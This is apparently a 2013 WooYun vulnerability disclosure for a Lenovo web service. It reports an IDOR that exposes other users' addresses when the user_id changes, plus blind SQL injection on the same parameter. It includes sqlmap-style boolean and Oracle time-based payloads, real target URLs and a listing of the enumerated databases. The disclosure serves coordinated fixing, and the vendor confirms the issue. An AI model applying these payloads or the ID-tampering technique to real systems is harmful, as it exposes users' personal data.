当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035384

漏洞标题:联想安全问题十二从越权到SQL注射(数千万联想用户信息可被泄露)

相关厂商:联想

漏洞作者: VIP

提交时间:2013-08-27 15:15

修复时间:2013-10-11 15:16

公开时间:2013-10-11 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-27: 细节已通知厂商并且等待厂商处理中
2013-08-29: 厂商已经确认,细节仅向厂商公开
2013-09-08: 细节向核心白帽子及相关领域专家公开
2013-09-18: 细节向普通白帽子公开
2013-09-28: 细节向实习白帽子公开
2013-10-11: 细节向公众公开

简要描述:

漏洞好多

详细说明:

首先是个越权(其实这个越权的价值比注射还要大,因为是盲注)
http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959270
把id改改就能看别人的地址什么的了
比如:
http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959267
http://spm3.lenovo.com.cn/sv/bs_user/bs_user_addrdisplay.aspx?user_id=34959266
等等等等
同样,这个地方也可以注射

漏洞证明:

越权的证明上面已经写了

---
Place: GET
Parameter: user_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: user_id=34959270' AND 2767=2767 AND 'iHtc'='iHtc
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: user_id=34959270' AND 2656=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_U
SERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'ADwq'='ADwq
---


web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Oracle


current user:    'SDM_SPM'


current schema (equivalent to database on Oracle):    'SDM_SPM'


数据库

available databases [16]:
[*] ADM
[*] ANALYSIS
[*] BAS
[*] CC
[*] CTXSYS
[*] EXFSYS
[*] LIDANE
[*] MDSYS
[*] OLAPSYS
[*] PART
[*] SDM_SPM
[*] SPM
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] XIAOTG


修复方案:

过滤吧 还有 把越权补一下

版权声明:转载请注明来源 VIP@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-08-29 23:24

厂商回复:

感谢您对联想安全做出的贡献!我们将立即评估与修复相关漏洞

最新状态:

暂无